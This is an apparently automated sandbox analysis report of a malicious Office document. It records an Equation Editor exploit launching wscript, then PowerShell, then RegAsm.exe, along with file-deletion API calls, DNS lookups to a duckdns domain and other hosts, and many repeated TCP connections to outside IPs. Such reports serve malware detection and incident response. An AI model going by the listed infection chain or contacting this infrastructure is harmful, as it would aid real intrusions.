                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407877 FindFirstFileW,FindNextFileW,12_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044E8F9 FindFirstFileExA,12_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_10006580 FindFirstFileExA,12_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior

                    Software Vulnerabilities

                    barindex
                    Document exploit detected (process start blacklist hit)
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Suspicious execution chain found
                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: global trafficDNS query: name: zeep.ly
                    Source: global trafficDNS query: name: zeep.ly
                    Source: global trafficDNS query: name: zeep.ly
                    Source: global trafficDNS query: name: zeep.ly
                    Source: global trafficDNS query: name: zeep.ly
                    Source: global trafficDNS query: name: ia601706.us.archive.org
                    Source: global trafficDNS query: name: dremom2.duckdns.org
                    Source: global trafficDNS query: name: geoplugin.net
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 95.217.202.210:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 178.237.33.50:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 95.217.202.210:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 207.241.227.96:443
